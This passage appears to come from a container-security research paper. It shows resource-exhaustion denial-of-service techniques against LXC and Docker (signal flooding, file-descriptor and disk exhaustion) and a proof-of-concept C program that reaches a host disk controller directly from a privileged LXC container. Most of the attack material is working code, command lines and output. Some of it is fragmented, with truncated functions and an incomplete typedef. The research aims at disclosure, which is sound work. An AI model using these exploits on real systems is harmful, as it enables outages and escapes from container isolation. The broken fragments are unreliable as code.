        printf("going to open mq: %s\n", biggest);
        /* the third argument is the permission mode of the new queue */
        mqdes = mq_open(biggest, O_RDWR | O_CREAT, 0600, NULL);
        if(mqdes == (mqd_t)-1) {
            perror("mq_open()");
            return 1;
        }
    }
}
Pending Signals
To queue up the maximum number of pending signals, a short C program which blocks all signals
can be used:
int main(void){
pthread_t thread;
sigset_t set;
int s;
The above can be built with `gcc signal.c -o signal -lpthread` and then run as `./signal`. Once
running, the maximum number of signals can be queued using a simple bash one-liner: `for i in
{1..3752}; do kill -64 <pid>; done`, where `<pid>` is the PID of the `signal` program, and 3752 was
the maximum number of pending signals allowed by ulimit.
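The mechanism being abused here is that a blocked signal is not discarded: it stays queued against the user's pending-signal limit until the target unblocks it. The following Python sketch demonstrates that behavior on a small scale by blocking a real-time signal, sending it to itself a few times, and checking that it is reported as pending. It is a stand-in written for illustration and not the C program referred to above; it assumes Linux, a single-threaded process, and hypothetical function names. It cleans up after itself by discarding the queued signals before unblocking.

```python
import os
import resource
import signal


def sigpending_limit():
    """Soft limit on queued signals for this user (what `ulimit -i` reports)."""
    return resource.getrlimit(resource.RLIMIT_SIGPENDING)[0]


def stays_pending(count=5, signum=signal.SIGRTMAX):
    """Block signum, send it to ourselves count times, report whether it is pending."""
    previous = signal.getsignal(signum)
    old_mask = signal.pthread_sigmask(signal.SIG_BLOCK, {signum})
    try:
        for _ in range(count):
            os.kill(os.getpid(), signum)
        return signum in signal.sigpending()
    finally:
        # Ignoring the signal discards the queued instances, so unblocking is safe
        signal.signal(signum, signal.SIG_IGN)
        signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)
        signal.signal(signum, previous if previous is not None else signal.SIG_DFL)
```

In the attack, the sender keeps going until the count reaches the value returned by `sigpending_limit()`, at which point further real-time signals for that user can no longer be queued.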
Max Processes
This is always one of my favorite denial-of-service attacks, because of how simple the “exploit” is
versus just how large an impact it can have. Even without trivial fork bombs, a sequential-forker of:
in an LXC container was enough to make my Vagrant VM close all my SSH sessions, after which the VM
had to be stopped with `vagrant halt --force`. This did not destabilize the host VM on Docker.
Max Files
To use up all available file descriptors (FDs), the following short C program can be used:
int main(void){
printf("stalling\n");
for(;;)
;
}
It can be compiled with `gcc file.c -o file` and run with `./file`. On Docker, this creates a simple and
effective DoS against other Docker containers. On LXC, the ulimits per container were set lower, but
this was still enough to cause a denial of service to other LXC containers. Exploiting the global file
descriptor limit follows along the same lines as the previous exploit, and is possible even when
containers do not share UID maps. In such a case where UID maps are non-shared, and containers
have a max-FD ulimit placed on each of their users, they can attempt to exhaust FDs by running
the above code as each user in their user namespace.
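The essence of the descriptor exhaustion is a loop that keeps opening files until the kernel refuses. The sketch below shows that loop in Python with a hard cap and immediate cleanup, so it can be run safely to observe the per-process limit; it is a bounded illustration with hypothetical function names, not the C program referred to above.

```python
import os
import resource


def nofile_limit():
    """Soft per-process limit on open file descriptors (what `ulimit -n` reports)."""
    return resource.getrlimit(resource.RLIMIT_NOFILE)[0]


def open_descriptors(cap):
    """Open up to cap descriptors on /dev/null, then close them; return how many opened."""
    fds = []
    try:
        while len(fds) < cap:
            fds.append(os.open("/dev/null", os.O_RDONLY))
    except OSError:
        # EMFILE: per-process limit reached; ENFILE: system-wide limit reached
        pass
    opened = len(fds)
    for fd in fds:
        os.close(fd)
    return opened
```

Calling `open_descriptors(nofile_limit() * 2)` returns a number slightly below the soft limit, since a few descriptors are already in use by the interpreter. An attacker would simply hold the descriptors open instead of closing them, and repeat the process as each user in the user namespace.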
where 18G is big enough to fill up the hard disk. Docker doesn’t allow fallocate, so slightly more
creativity is needed. dd proved ineffective when trying this attack, and so the following script
was written as a PoC:
#!/usr/bin/env python
# @author jhertz
# quick and dirty script to make a big file (~18 gigs)
# this is far from the most efficient way to do this
with open("big_file", "w") as f:
    # write 1 MiB per iteration; the with-block closes the file on exit
    for i in range(1, 1024 * 18):
        f.write("B" * 1024 * 1024)
        f.flush()
This proof of concept is meant to demonstrate the ability to circumvent an LXC privileged
container’s “security boundary” by communicating with underlying hardware directly.
Environment
• The test environment for this one was a VMware Workstation [84] VM running
Ubuntu trusty64. The primary disk was a SCSI disk, but a secondary target 1GB SATA disk
was added, with no special settings (write caching was enabled by default).
• Communication is possible regardless of the mount state of the drive.
• A default LXC privileged environment was created using the instructions at [58].
• As the root user in the LXC container, lspci -vv was used to get the
information about the target AHCI device:
• To demonstrate the vulnerability, compile the attached tool (pciread.c), and
then run it within the container. In this example, the invocation and output were:
#./pciread -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1
bar: fd5ee000 bus: 02 device: 05 function: 0
opened /proc/bus/pci/02/05.0
mapping 1 pages of size: 4096
AHCI 0001.0300 32 slots 30 ports 6 Gbps 0x3fffffff impl
• The hexdump output shows the ATA IDENTIFY command response sent back
from the controller.
• There are some assumptions the code makes. It assumes the drive it is
going to talk to is the first device it finds in the AHCI port list
that is actually active.
• Also, it doesn't cleanly restore everything after getting the response,
so the mapped registers are left in an inconsistent state and the kernel won't be
able to mount the device afterwards.
Explanation of PoC
While reading the attached code is instructive, here is an overview of the methodology used:
• Map the control region of the AHCI device into memory through the /proc/bus/pci/
interface using open(), mmap(), and ioctl().
• Allocate several buffers, and determine their physical address using /proc/self/pagemap.
• Disable interrupts for the device.
• Find the port the drive is attached to.
• Set the FIS, Command, and Command List pointers on the device to the previously
allocated buffers.
• Create a H2D FIS (to tell the drive to identify itself), a command to wrap the FIS (telling the
drive to use a DMA buffer we have allocated), and a command list structure containing the
command.
• Copy all of these to the previously allocated buffers, which the device also now has
pointers to.
• Flip the start bit on the device to cause it to process commands from the command list.
• Sleep for a second, then spin loop until the drive has processed the command.
• The drive has now executed our command (ATA_CMD_ID_ATA, which is the drive
identification command), and written the result to a buffer we allocated. Print it out, and
attempt (poorly) to restore the drive's state.
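The buffer address lookup through /proc/self/pagemap mentioned in the steps above works because the device performs DMA and therefore needs real memory addresses rather than the process's virtual ones. Each page of virtual memory has one 64-bit entry in the pagemap file, where bit 63 indicates that the page is present in RAM and bits 0-54 hold the page frame number. The sketch below decodes such an entry. It is an illustration in Python with hypothetical function names, not an excerpt from pciread.c, and it assumes 4096-byte pages. Note that newer kernels hide the frame number from processes lacking CAP_SYS_ADMIN.

```python
import struct

PFN_MASK = (1 << 55) - 1   # bits 0-54: page frame number
PRESENT = 1 << 63          # bit 63: page is present in RAM


def decode_pagemap_entry(entry):
    """Return the page frame number from a pagemap entry, or None if not present."""
    if not entry & PRESENT:
        return None
    return entry & PFN_MASK


def physical_address(entry, vaddr, page_size=4096):
    """Combine the frame number with the offset of vaddr inside its page."""
    pfn = decode_pagemap_entry(entry)
    if not pfn:
        return None  # page absent, or frame number hidden by the kernel
    return pfn * page_size + (vaddr % page_size)


def read_pagemap_entry(vaddr, pid="self", page_size=4096):
    """Read the raw 64-bit pagemap entry covering virtual address vaddr."""
    with open("/proc/{}/pagemap".format(pid), "rb") as f:
        f.seek((vaddr // page_size) * 8)  # one 8-byte entry per page
        return struct.unpack("=Q", f.read(8))[0]
```

As a worked example, an entry with the present bit set and frame number 0x1234, looked up for virtual address 0x7f0000000abc, yields 0x1234 * 4096 + 0xabc = 0x1234abc.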
/*
* LxC PCI Device Access Through /proc/ PoC
* Sample code to map in PCI memory for a specified AHCI device and
* tell the device to identify itself.
* “vulnerability” discovered by jhertz
* PoC written by aaron adams
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/pci.h>
#include <linux/limits.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
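int open_pmap(void)
{
    int fd;
    int rc;
    char *pmap;
    /* build the path to this process's pagemap file */
    rc = asprintf(&pmap, "/proc/%d/pagemap", getpid());
    if (rc < 0) {
        perror("asprintf");
        exit(EXIT_FAILURE);
    }
    fd = open(pmap, O_RDONLY);
    if (fd < 0)
        perror("open");
    free(pmap);
    return fd;
}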
p = buf;
n = sprintf(p, "\n");
p += n;
if (i != size) {
n = sprintf(p, "%.02x ", *addr & 0xff);
p += n;
addr = (char *)((unsigned long)addr +1);
// FIS_TYPE_REG_H2D
struct host_to_dev_fis {
unsigned char type;
unsigned char opts;
unsigned char command;
unsigned char features;
union {
unsigned char lba_low;
unsigned char sector;
};
union {
unsigned char lba_mid;
unsigned char cyl_low;
};
union {
unsigned char lba_hi;
unsigned char cyl_hi;
};
union {
unsigned char device;
unsigned char head;
};
union {
unsigned char lba_low_ex;
unsigned char sector_ex;
};
union {
unsigned char lba_mid_ex;
unsigned char cyl_low_ex;
};
union {
unsigned char lba_hi_ex;
unsigned char cyl_hi_ex;
};
unsigned char features_ex;
// FIS_TYPE_DMA_SETUP
struct dma_setup_fis {
unsigned char type;
unsigned char opts;
unsigned short reserved;
uint64_t dma_id;
uint32_t rsvd1;
uint32_t dma_offset;
uint32_t transfer_count;
uint32_t rsvd2;
};
/* Command header structure. These entries are in what the spec calls the
* 'command list' */
struct cmd_hdr {
/*
* Command options.
* - Bits 31:16 Number of PRD entries.
* - Bits 15:8 Unused in this implementation.
* - Bit 7 Prefetch bit, informs the drive to prefetch PRD entries.
* - Bit 6 Write bit, should be set when writing data to the device.
* - Bit 5 Unused in this implementation.
* - Bits 4:0 Length of the command FIS in DWords (DWord = 4 bytes).
*/
unsigned int opts;
/* This field is unused when using NCQ. */
union {
unsigned int byte_count;
unsigned int status;
};
unsigned int ctba; // 128-byte aligned command table addr
unsigned int ctbau; // upper addr bits if 64-bit is used
unsigned int res[4];
};
typedef enum
enum {
ATA_ID_WORDS = 256,
ATA_CMD_ID_ATA = 0xEC
};
/* HOST_CTL bits */
HOST_RESET = (1 << 0), /* reset controller; self-clear */
HOST_IRQ_EN = (1 << 1), /* global IRQ enable */
HOST_MRSM = (1 << 2), /* MSI Revert to Single Message */
HOST_AHCI_EN = (1 << 31), /* AHCI enabled */
/* HOST_CAP bits */
HOST_CAP_SXS = (1 << 5), /* Supports External SATA */
HOST_CAP_EMS = (1 << 6), /* Enclosure Management support */
HOST_CAP_CCC = (1 << 7), /* Command Completion Coalescing */
HOST_CAP_PART = (1 << 13), /* Partial state capable */
HOST_CAP_SSC = (1 << 14), /* Slumber state capable */
HOST_CAP_PIO_MULTI = (1 << 15), /* PIO multiple DRQ support */
HOST_CAP_FBS = (1 << 16), /* FIS-based switching support */
HOST_CAP_PMP = (1 << 17), /* Port Multiplier support */
HOST_CAP_ONLY = (1 << 18), /* Supports AHCI mode only */
HOST_CAP_CLO = (1 << 24), /* Command List Override support */
HOST_CAP_LED = (1 << 25), /* Supports activity LED */
HOST_CAP_ALPM = (1 << 26), /* Aggressive Link PM support */
HOST_CAP_SSS = (1 << 27), /* Staggered Spin-up */
HOST_CAP_MPS = (1 << 28), /* Mechanical presence switch */
HOST_CAP_SNTF = (1 << 29), /* SNotification register */
HOST_CAP_NCQ = (1 << 30), /* Native Command Queueing */
HOST_CAP_64 = (1 << 31), /* PCI DAC (64-bit DMA) support */
/* HOST_CAP2 bits */
HOST_CAP2_BOH = (1 << 0), /* BIOS/OS handoff supported */
HOST_CAP2_NVMHCI = (1 << 1), /* NVMHCI supported */
HOST_CAP2_APST = (1 << 2), /* Automatic partial to slumber */
HOST_CAP2_SDS = (1 << 3), /* Support device sleep */
HOST_CAP2_SADM = (1 << 4), /* Support aggressive DevSlp */
HOST_CAP2_DESO = (1 << 5), /* DevSlp from slumber only */
/* PORT_IRQ_{STAT,MASK} bits */
PORT_IRQ_COLD_PRES = (1 << 31), /* cold presence detect */
PORT_IRQ_TF_ERR = (1 << 30), /* task file error */
PORT_IRQ_HBUS_ERR = (1 << 29), /* host bus fatal error */
PORT_IRQ_HBUS_DATA_ERR = (1 << 28), /* host bus data error */
PORT_IRQ_IF_ERR = (1 << 27), /* interface fatal error */
PORT_IRQ_IF_NONFATAL = (1 << 26), /* interface non-fatal error */
PORT_IRQ_OVERFLOW = (1 << 24), /* xfer exhausted available S/G */
PORT_IRQ_BAD_PMP = (1 << 23), /* incorrect port multiplier */
PORT_IRQ_FREEZE = PORT_IRQ_HBUS_ERR |
PORT_IRQ_IF_ERR | PORT_IRQ_CONNECT |
PORT_IRQ_PHYRDY | PORT_IRQ_UNK_FIS |
PORT_IRQ_BAD_PMP,
PORT_IRQ_ERROR = PORT_IRQ_FREEZE |
PORT_IRQ_TF_ERR | PORT_IRQ_HBUS_DATA_ERR,
DEF_PORT_IRQ = PORT_IRQ_ERROR | PORT_IRQ_SG_DONE |
PORT_IRQ_SDB_FIS | PORT_IRQ_DMAS_FIS |
PORT_IRQ_PIOS_FIS | PORT_IRQ_D2H_REG_FIS,
/* PORT_CMD bits */
PORT_CMD_ASP = (1 << 27), /* Aggressive Slumber/Partial */
/* PORT_FBS bits */
PORT_FBS_DWE_OFFSET = 16, /* FBS device with error offset */
PORT_FBS_ADO_OFFSET = 12, /* FBS active dev optimization offset */
PORT_FBS_DEV_OFFSET = 8, /* FBS device to issue offset */
PORT_FBS_DEV_MASK = (0xf << PORT_FBS_DEV_OFFSET), /* FBS.DEV */
PORT_FBS_SDE = (1 << 2), /* FBS single device error */
PORT_FBS_DEC = (1 << 1), /* FBS device error clear */
PORT_FBS_EN = (1 << 0), /* Enable FBS */
/* PORT_DEVSLP bits */
PORT_DEVSLP_DM_OFFSET = 25, /* DITO multiplier offset */
PORT_DEVSLP_DM_MASK = (0xf << 25), /* DITO multiplier mask */
PORT_DEVSLP_DITO_OFFSET = 15, /* DITO offset */
PORT_DEVSLP_MDAT_OFFSET = 10, /* Minimum assertion time */
PORT_DEVSLP_DETO_OFFSET = 2, /* DevSlp exit timeout */
PORT_DEVSLP_DSP = (1 << 1), /* DevSlp present */
PORT_DEVSLP_ADSE = (1 << 0), /* Aggressive DevSlp enable */
/* hpriv->flags bits */
/* ap->flags bits */
ICH_MAP = 0x90, /* ICH MAP register */
/* em constants */
EM_MAX_SLOTS = 8,
EM_MAX_RETRY = 5,
/* em_ctl bits */
EM_CTL_RST = (1 << 9), /* Reset */
EM_CTL_TM = (1 << 8), /* Transmit Message */
EM_CTL_MR = (1 << 0), /* Message Received */
EM_CTL_ALHD = (1 << 26), /* Activity LED */
EM_CTL_XMT = (1 << 25), /* Transmit Only */
EM_CTL_SMB = (1 << 24), /* Single Message Buffer */
EM_CTL_SGPIO = (1 << 19), /* SGPIO messages supported */
EM_CTL_SES = (1 << 18), /* SES-2 messages supported */
EM_CTL_SAFTE = (1 << 17), /* SAF-TE messages supported */
EM_CTL_LED = (1 << 16), /* LED messages supported */
/* em message type */
EM_MSG_TYPE_LED = (1 << 0), /* LED */
EM_MSG_TYPE_SAFTE = (1 << 1), /* SAF-TE */
EM_MSG_TYPE_SES2 = (1 << 2), /* SES-2 */
EM_MSG_TYPE_SGPIO = (1 << 3), /* SGPIO */
};
void
usage(char *p)
{
printf("%s <opts>\n"
" -b Bus ID\n"
" -d Device ID\n"
" -f Function ID\n"
" -a BAR (phys addr)\n"
" -p Number of pages to map\n"
" -h This usage info\n"
"Ex: %s -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1\n"
, p, p);
/* This is meant to mimic the output from dmesg | grep AHCI . If there is a
* match then we know at least we have the right mem location */
void
print_ahci_info(ahci_host_t *p)
{
uint32_t speed;
char * speed_s;
ctl = p->ctl;
if ((ctl & HOST_RESET) == 0) {
printf("resetting...\n");
p->ctl = (ctl | HOST_RESET);
ctl = p->ctl;
}
sleep(2);
ctl = p->ctl;
if (ctl & HOST_RESET) {
void *
ahci_port_base(char * p)
{
return p + PORT_OFFSET;
}
hba_port_t *
ahci_port_entry(char * p, int port_num)
{
return (hba_port_t *)((p + PORT_OFFSET) + (port_num * PORT_SIZE));
}
void
print_interrupt_bits(int ie)
{
if (ie & PORT_IRQ_D2H_REG_FIS)
printf("\tPORT_IRQ_D2H_REG_FIS\n");
if (ie & PORT_IRQ_PIOS_FIS)
printf("\tPORT_IRQ_PIOS_FIS\n");
if (ie & PORT_IRQ_DMAS_FIS)
printf("\tPORT_IRQ_DMAS_FIS\n");
if (ie & PORT_IRQ_SDB_FIS)
printf("\tPORT_IRQ_SDB_FIS\n");
if (ie & PORT_IRQ_UNK_FIS)
printf("\tPORT_IRQ_UNK_FIS\n");
if (ie & PORT_IRQ_SG_DONE)
printf("\tPORT_IRQ_SG_DONE\n");
if (ie & PORT_IRQ_CONNECT)
printf("\tPORT_IRQ_CONNECT\n");
if (ie & PORT_IRQ_DEV_ILCK)
printf("\tPORT_IRQ_DEV_ILCK\n");
if (ie & PORT_IRQ_PHYRDY)
printf("\tPORT_IRQ_PHYRDY\n");
if (ie & PORT_IRQ_BAD_PMP)
printf("\tPORT_IRQ_BAD_PMP\n");
if (ie & PORT_IRQ_OVERFLOW)
printf("\tPORT_IRQ_OVERFLOW\n");
if (ie & PORT_IRQ_IF_NONFATAL)
printf("\tPORT_IRQ_IF_NONFATAL\n");
if (ie & PORT_IRQ_IF_ERR)
void
print_command_bits(int cmd)
{
if (cmd & PORT_CMD_START)
printf("\tPORT_CMD_START\n");
if (cmd & PORT_CMD_SPIN_UP)
printf("\tPORT_CMD_SPIN_UP\n");
if (cmd & PORT_CMD_POWER_ON)
printf("\tPORT_CMD_POWER_ON\n");
if (cmd & PORT_CMD_CLO)
printf("\tPORT_CMD_CLO\n");
if (cmd & PORT_CMD_FIS_RX)
printf("\tPORT_CMD_FIS_RX\n");
if (cmd & PORT_CMD_FIS_ON)
printf("\tPORT_CMD_FIS_ON\n");
if (cmd & PORT_CMD_LIST_ON)
printf("\tPORT_CMD_LIST_ON\n");
if (cmd & PORT_CMD_PMP)
printf("\tPORT_CMD_PMP\n");
if (cmd & PORT_CMD_FBSCP)
printf("\tPORT_CMD_FBSCP\n");
if (cmd & PORT_CMD_ATAPI)
printf("\tPORT_CMD_ATAPI\n");
if (cmd & PORT_CMD_ALPE)
printf("\tPORT_CMD_ALPE\n");
if (cmd & PORT_CMD_ASP)
printf("\tPORT_CMD_ASP\n");
}
void
print_ahci_port(hba_port_t * p)
{
printf("command list base address: 0x%x\n", p->clb);
printf("FIS base address: 0x%x\n", p->fb);
printf("interrupt status: 0x%x\n", p->is);
print_interrupt_bits(p->is);
void
start_cmd(hba_port_t *p)
{
printf("Waiting for PORT_CMD_START\n");
while(p->cmd & PORT_CMD_START);
printf("PORT_CMD_START is off\n");
p->cmd |= PORT_CMD_FIS_RX;
p->cmd |= PORT_CMD_START;
printf("Started cmd engine\n");
}
void
stop_cmd(hba_port_t *p)
{
int cmd;
printf("Before:\n");
print_command_bits(p->cmd);
p->cmd &= ~PORT_CMD_START;
cmd = p->cmd; // flush
/* XXX - This should use the ports_impl member to actually find the first one
instead */
int32_t
find_inuse_port(ahci_host_t *p)
{
int32_t port;
int32_t port_count;
hba_port_t * hbap;
return -1;
}
/* For larger data transfers we would have an issue here with forcing the
 * adjacent physical pages needed for DMA. Transferring one 512-byte sector
 * at a time might be okay, though. */
char *
alloc_phy(uint32_t len, uint64_t * phy)
{
char * vaddr;
static int32_t pmap = 0;
if (len > PAGE_SIZE) {
}
vaddr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0);
if ((int64_t)vaddr == -1) {
perror("mmap");
exit(EXIT_FAILURE);
}
// Touch it to be sure it's actually mapped
memset(vaddr, 0, len);
// Lock it to ensure it doesn't get swapped out during DMA
mlock(vaddr, len);
if (!pmap) {
pmap = open_pmap();
}
*phy = vaddr_to_paddr(pmap, (uint64_t)vaddr);
return vaddr;
}
void
disable_interrupts(ahci_host_t * p)
{
uint32_t ctl;
void
enable_interrupts(ahci_host_t * p)
{
uint32_t ctl;
ctl = p->ctl | HOST_IRQ_EN;
p->ctl = ctl;
ctl = p->ctl; // flush
if (ctl & HOST_IRQ_EN) {
int32_t
main(int32_t argc, char **argv)
{
uint32_t c;
char path[PATH_MAX];
int32_t fd;
char * bus;
char * device;
char * function;
uint32_t sbus, sdevfn, svend;
unsigned long bar, sbar =0;
uint32_t total_read_size;
ahci_host_t * p;
char * ptr;
char * dma; // data sent and received via scatter/gather
uint64_t dma_phy;
char * cmd_list; // new address of command list
uint64_t cmd_list_phy;
char * cmd; // address of command table
uint64_t cmd_phy;
char * fis_buf; // address to receive FIS responses
uint64_t fis_buf_phy;
unsigned int num_pages;
uint32_t orig_cmd_list;
uint32_t orig_cmd_listu;
uint32_t orig_fis;
uint32_t orig_fisu;
struct host_to_dev_fis fis;
struct dma_setup_fis setup_fis;
struct cmd_hdr * cmd_hdr;
struct cmd_sg * cmd_sg;
int32_t fis_len;
int32_t buf_len;
int32_t tmp;
int32_t i;
int32_t complete;
int32_t done;
fd = open(path, O_RDWR);
if (fd == -1) {
printf("Failed to open: %s\n", path);
perror("open");
exit(1);
}
print_ahci_info((ahci_host_t *) ptr);
p = (ahci_host_t *)ptr;
// Disable interrupts for this device so the kernel doesn't get involved.
// This obviously breaks if it's the main disk, since it will stop
// working...
disable_interrupts(p);
/* This means the FIS DMA setup functionality is hidden by the AHCI
* controller itself, and it will copy to our buffers, specified via SG in
* other FIS directly */
if (p->cap & HOST_CAP_NCQ) {
printf("Supports native command queuing\n");
}
hba_port_t * hbap;
hbap = ahci_port_entry((char *)p, tport);
// if you want to just crash a machine you can zero out everything
//memset(hbap, 0, sizeof(hba_port_t));
orig_fis = hbap->fb;
orig_fisu = hbap->fbu;
orig_cmd_list = hbap->clb;
orig_cmd_listu = hbap->clbu;
memset(&fis, 0, sizeof(fis));
memset(&setup_fis, 0, sizeof(setup_fis));
complete = 0;
printf("interrupt status after: 0x%x\n", hbap->is);
print_interrupt_bits(hbap->is);
// Wait for something to use our physical address
printf("Waiting for command completion\n");
done = 0;
while(!done) {
if ((hbap->ci & 1) == 0 && !complete) {
printf("Seems to have completed...\n");
complete = 1;
}
else if (!complete) {
printf("wasn't complete\n");
}
if ((hbap->is & PORT_IRQ_TF_ERR)) {
print_interrupt_bits(hbap->is);
print_ahci_port(hbap);
printf("Taskfile error\n");
printf("tfd : 0x%x\n", hbap->tfd);
printf("DIAG error\n");
printf("diag : 0x%x\n", hbap->serr);
hexdump(dma, 256);
break;
}
sleep(1);
hbap->fb = orig_fis;
hbap->fbu = orig_fisu;
hbap->clb = orig_cmd_list;
hbap->clbu = orig_cmd_listu;
enable_interrupts(p);
munmap(dma, PAGE_SIZE);
munmap(cmd_list, PAGE_SIZE);
munmap(cmd, PAGE_SIZE);
munmap(fis_buf, PAGE_SIZE);
munmap(ptr, total_read_size);
close(fd);
return 0;
}
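alloc_phy() in the listing above hands the device physical addresses obtained through open_pmap() and vaddr_to_paddr(), whose bodies are abbreviated here. One common way to do this translation from userspace is to read /proc/self/pagemap, and the sketch below assumes that approach; it is not necessarily what the PoC does. The names pagemap_entry_to_paddr() and vaddr_to_paddr_sketch() are hypothetical. The entry format (one 64-bit entry per virtual page, bit 63 for "present", bits 0-54 for the page frame number) comes from the kernel's pagemap documentation. Recent kernels report a zero PFN to callers without CAP_SYS_ADMIN, so the sketch treats a zero PFN as a failure.

```c
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <stdint.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGEMAP_PRESENT  (1ULL << 63)        /* page is present in RAM */
#define PAGEMAP_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: page frame number */

/*
 * Decode one pagemap entry into a physical address.
 * Returns 0 if the page is not present or the kernel hid the PFN.
 */
static uint64_t pagemap_entry_to_paddr(uint64_t entry, uint64_t vaddr,
                                       uint64_t page_size)
{
    uint64_t pfn;

    if (!(entry & PAGEMAP_PRESENT))
        return 0;
    pfn = entry & PAGEMAP_PFN_MASK;
    if (pfn == 0)
        return 0;
    return pfn * page_size + (vaddr % page_size);
}

/*
 * Look up vaddr in an already opened /proc/self/pagemap descriptor,
 * e.g. one obtained with open("/proc/self/pagemap", O_RDONLY).
 * Returns 0 on any failure.
 */
static uint64_t vaddr_to_paddr_sketch(int pagemap_fd, uint64_t vaddr)
{
    uint64_t page_size = (uint64_t)sysconf(_SC_PAGESIZE);
    uint64_t entry = 0;
    off_t offset = (off_t)((vaddr / page_size) * sizeof(entry));

    if (pread(pagemap_fd, &entry, sizeof(entry), offset)
            != (ssize_t)sizeof(entry))
        return 0;
    return pagemap_entry_to_paddr(entry, vaddr, page_size);
}
```

The buffer should be touched and locked before the lookup, as alloc_phy() does with memset() and mlock(), since an untouched page has no physical frame and a swapped-out page would leave the device holding a stale address.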